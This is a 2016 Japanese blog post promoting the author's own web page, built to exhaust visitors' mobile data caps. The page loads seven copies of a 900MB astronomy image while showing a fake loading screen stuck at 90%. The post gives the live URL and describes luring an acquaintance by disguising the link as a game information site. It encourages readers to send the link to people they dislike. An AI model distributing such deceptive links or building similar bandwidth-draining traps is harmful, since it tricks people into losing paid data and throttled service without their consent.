2016年2月16日火曜日

開くだけで通信制限になるサイトを作った

anrtv.luna.ddns.vc/pic/road.html

いいか!開くなよ?絶対にだ!


天体望遠鏡画像のcygloop.jpg。一年ほど前にLTE/4Gで開くと通信規制にかかると話題になっていた。なんとこいつ、一枚900MBもある。その分超綺麗。(1.7GBのcygloop.tifもあるけどファイル形式が特殊なので割愛)

そんなcygloopであるが、最近、YouTubeに動画上げ出したりする連中が現れたり、ちらほらと見かける機会が増えてきた。

しかし、開くと通信速度が規制、と言われても携帯回線は一か月7GBとか5GBとか使えるわけで、900MBの画像では意味がない。しかも海外サーバーなので速度が出ない。


ならば、国内にサーバーを何個か作って同時に読み込めば速いのではなかろうか。
俺天才。


というわけでcygloop.jpgを7枚読み込み、規制にかかるまで通信させるというとんでもない神極悪サイトが完成しました。

それがこちら(間違えてでもLTEで開くなよ!)


何かの読み込み画面に見えるけど、これは嘘。パーセンテージは90%で止まり、パーセンテージとは関係なしに裏で画像を読み込み続けます。
余談ですが、私の知人に艦これの情報サイトと称して送り付けたところ見事に釣れました。



嫌いなアイツに送りつけるもよし。大好きなあの子にプレゼントするもよし。
用法容量を守って正しくお使いください。

ブッチチチブリュリ

0 件のコメント:

コメントを投稿